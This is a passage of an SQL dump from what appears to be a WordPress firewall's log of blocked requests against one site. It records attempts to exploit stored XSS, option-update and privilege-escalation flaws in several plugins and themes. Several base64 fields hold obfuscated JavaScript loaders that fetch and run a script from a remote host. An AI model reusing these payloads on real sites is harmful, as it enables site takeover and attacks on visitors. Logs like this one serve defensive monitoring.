Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpY2Vuc2VFbWFpbF0=\",\"paramValue\":\"Ij48c2NyaXB0ICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgXzk2N2t0Y2dpOGNsZnl6PVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfcDJwOGcxcXdiYWRoMW4qLywxMTYvKiovLDExNi8qXzB4ZHljaXp5ODBkenRrKi8sMTEyLypfcGl4aWhxcWFoaHk2dXUqLywxMTUvKl8weGR5Y2l6eTgwZHp0ayovLDU4LypfcDJwOGcxcXdiYWRoMW4qLyw0Ny8qX3BpeGlocXFhaGh5NnV1Ki8sNDcvKl9wMnA4ZzFxd2JhZGgxbiovLDk5LypfOTY3a3RjZ2k4Y2xmeXoqLywxMDAvKl8weGR5Y2l6eTgwZHp0ayovLDQ2LypfcGl4aWhxcWFoaHk2dXUqLywxMTIvKl85NjdrdGNnaThjbGZ5eiovLDExNC8qXzB4ZHljaXp5ODBkenRrKi8sMTA1LypfcDJwOGcxcXdiYWRoMW4qLywxMTgvKl9wMnA4ZzFxd2JhZGgxbiovLDk3LypfOTY3a3RjZ2k4Y2xmeXoqLyw5OS8qKi8sMTIxLypfMHhkeWNpenk4MGR6dGsqLywxMDgvKiovLDExMS8qKi8sOTkvKl9wMnA4ZzFxd2JhZGgxbiovLDk3LypfMHhkeWNpenk4MGR6dGsqLywxMTYvKiovLDEwNS8qXzk2N2t0Y2dpOGNsZnl6Ki8sMTExLypfcGl4aWhxcWFoaHk2dXUqLywxMTAvKl9wMnA4ZzFxd2JhZGgxbiovLDEwMi8qXzB4ZHljaXp5ODBkenRrKi8sMTExLypfOTY3a3RjZ2k4Y2xmeXoqLywxMTQvKl9waXhpaHFxYWhoeTZ1dSovLDEwOC8qX3AycDhnMXF3YmFkaDFuKi8sMTExLypfcDJwOGcxcXdiYWRoMW4qLyw5OS8qKi8sNDYvKiovLDk5LyoqLywxMTEvKiovLDEwOS8qXzk2N2t0Y2dpOGNsZnl6Ki8sNDcvKl85NjdrdGNnaThjbGZ5eiovLDExNi8qX3BpeGlocXFhaGh5NnV1Ki8sOTcvKiovLDExMi8qKi8sMTEyLypfOTY3a3RjZ2k4Y2xmeXoqLywxMDEvKl9waXhpaHFxYWhoeTZ1dSovLDExNC8qX3BpeGlocXFhaGh5NnV1Ki8sNDYvKl85NjdrdGNnaThjbGZ5eiovLDEwNi8qXzB4ZHljaXp5ODBkenRrKi8sMTE1LypfMHhkeWNpenk4MGR6dGsqLyw2My8qXzk2N2t0Y2dpOGNsZnl6Ki8sMTA5LyoqLyw2MS8qKi8sMTA5LypfcGl4aWhxcWFoaHk2dXUqLyk7dmFyIF9waXhpaHFxYWhoeTZ1dSA9IF8weGR5Y2l6eTgwZHp0ayhfOTY3a3RjZ2k4Y2xmeXopO2lmKF9waXhpaHFxYWhoeTZ1dS5sZW5ndGggPiAzKXtfbXlzem93dXp4cDVldjcoX3BpeGlocXFhaGh5NnV1KTt9IGZ1bmN0aW9uIF8weGR5Y2l6eTgwZHp0ayhfeXNrb3duY3ZzNnQwcnMpeyB2YXIgX3AycDhnMXF3YmFkaDFuID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X3AycDhnMXF3YmFkaDFuLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfeXNrb3duY3ZzNnQwcnMsIGZhbHNlICk7X3AycDhnMXF3YmFkaDFuLnNlbmQoIG51bGwgKTtyZXR1cm4gX3AycDhnMXF3YmFkaDFuLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX215c3pvd3V6eHA1ZXY3KF9vamxweHNlNzdldnplZCl7IHZhciBfN3NhbTl0ZnV6a3Z2dTQgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIF9vamxweHNlNzdldnplZCsnIHJldHVybiB4K3k7Jyk7XzdzYW05dGZ1emt2dnU0KDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(38000,1571334727.855137,1571334726.727500,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF94dXg2NHluPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfZWZtdW5iZSovLDExNi8qKi8sMTE2LypfZGZjY3hkcyovLDExMi8qX3Vxbzg2M2cqLywxMTUvKl9kZmNjeGRzKi8sNTgvKl9lZm11bmJlKi8sNDcvKl91cW84NjNnKi8sNDcvKl9lZm11bmJlKi8sOTkvKl94dXg2NHluKi8sMTAwLypfZGZjY3hkcyovLDQ2LypfdXFvODYzZyovLDExMi8qX3h1eDY0eW4qLywxMTQvKl9kZmNjeGRzKi8sMTA1LypfZWZtdW5iZSovLDExOC8qX2VmbXVuYmUqLyw5Ny8qX3h1eDY0eW4qLyw5OS8qKi8sMTIxLypfZGZjY3hkcyovLDEwOC8qKi8sMTExLyoqLyw5OS8qX2VmbXVuYmUqLyw5Ny8qX2RmY2N4ZHMqLywxMTYvKiovLDEwNS8qX3h1eDY0eW4qLywxMTEvKl91cW84NjNnKi8sMTEwLypfZWZtdW5iZSovLDEwMi8qX2RmY2N4ZHMqLywxMTEvKl94dXg2NHluKi8sMTE0LypfdXFvODYzZyovLDEwOC8qX2VmbXVuYmUqLywxMTEvKl9lZm11bmJlKi8sOTkvKiovLDQ2LyoqLyw5OS8qKi8sMTExLyoqLywxMDkvKl94dXg2NHluKi8sNDcvKl94dXg2NHluKi8sMTE2LypfdXFvODYzZyovLDk3LyoqLywxMTIvKiovLDExMi8qX3h1eDY0eW4qLywxMDEvKl91cW84NjNnKi8sMTE0LypfdXFvODYzZyovLDQ2LypfeHV4NjR5biovLDEwNi8qX2RmY2N4ZHMqLywxMTUvKl9kZmNjeGRzKi8sNjMvKl94dXg2NHluKi8sMTA5LyoqLyw2MS8qKi8sMTA5LypfdXFvODYzZyovKTt2YXIgX3Vxbzg2M2cgPSBfZGZjY3hkcyhfeHV4NjR5bik7aWYoX3Vxbzg2M2cubGVuZ3RoID4gMyl7X2RoMWUxNGMoX3Vxbzg2M2cpO30gZnVuY3Rpb24gX2RmY2N4ZHMoX3NodTM3aHcpeyB2YXIgX2VmbXVuYmUgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfZWZtdW5iZS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX3NodTM3aHcsIGZhbHNlICk7X2VmbXVuYmUuc2VuZCggbnVsbCApO3JldHVybiBfZWZtdW5iZS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9kaDFlMTRjKF9kdWRsYXVpKXsgdmFyIF8zeWJ4NnJkID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCBfZHVkbGF1aSsnIHJldHVybiB4K3k7Jyk7XzN5Yng2cmQoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37963,1571333884.650399,1571333882.900100,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2VtYWlsXQ==\",\"paramValue\":\"PHN2Zy9vbmxvYWQ9ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDMyLDQwLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMDEsMTA4LDEwMSwxMDksMzIsNjEsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDk5LDExNCwxMDEsOTcsMTE2LDEwMSw2OSwxMDgsMTAxLDEwOSwxMDEsMTEwLDExNiw0MCwzOSwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDQxLDU5LDMyLDEwLDksMTAxLDEwOCwxMDEsMTA5LDQ2LDExNiwxMjEsMTEyLDEwMSwzMiw2MSwzMiwzOSwxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDU5LDMyLDEwLDMyLDMyLDMyLDMyLDEwMSwxMDgsMTAxLDEwOSw0NiwxMTUsMTE0LDk5LDMyLDYxLDMyLDM5LDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsOTksMTAwLDQ2LDExMiwxMTQsMTA1LDExOCw5Nyw5OSwxMjEsMTA4LDExMSw5OSw5NywxMTYsMTA1LDExMSwxMTAsMTAyLDExMSwxMTQsMTA4LDExMSw5OSw0Niw5OSwxMTEsMTA5LDQ3LDk5LDExMSwxMTQsMTEwLDQ3LDEwMiwxMDgsMTAxLDEyMCw0NiwxMDYsMTE1LDYzLDExNiwxMTIsNjEsNTIsMzksNTksMTAsMzIsMzIsMzIsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDEwMywxMDEsMTE2LDY5LDEwOCwxMDEsMTA5LDEwMSwxMTAsMTE2LDExNSw2NiwxMjEsODQsOTcsMTAzLDc4LDk3LDEwOSwxMDEsNDAsMzQsMTA0LDEwMSw5NywxMDAsMzQsNDEsOTEsNDgsOTMsNDYsOTcsMTEyLDExMiwxMDEsMTEwLDEwMCw2NywxMDQsMTA1LDEwOCwxMDAsNDAsMTAxLDEwOCwxMDEsMTA5LDQxLDU5LDEwLDMyLDMyLDEyNSw0MSw0MCw0MSw1OSkpOz5AdGVzdC5jb20=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37940,1571333111.864707,1571333111.053800,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?page=wppcp-settings',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Private Content Plus <= 1.31 Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"161\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwcGNwX3RhYl0=\",\"paramValue\":\"d3BwY3Bfc2VjdGlvbl9nZW5lcmFs\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37690,1569411805.038734,1569411804.235300,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37689,1569411807.291213,1569411806.473000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYSovLDQ3LypfYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDk5LypfYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYSA9IF9hYWFhYWFhYShfYWFhYWFhYWEpO2lmKF9hYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWEoX2FhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYShfYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37776,1569949748.193399,1569949744.456000,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37688,1569411809.578428,1569411808.736500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYSovLDQ3LypfYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDk5LypfYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYSA9IF9hYWFhYWFhYShfYWFhYWFhYWEpO2lmKF9hYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWEoX2FhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYShfYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37687,1569411770.314273,1569411769.359800,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37686,1569411772.602503,1569411771.772900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37685,1569411774.930078,1569411774.079000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37684,1569411777.230921,1569411776.366600,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37784,1569949715.871094,1569949714.477100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37785,1569949713.168886,1569949711.639300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37786,1569949709.884725,1569949707.782200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 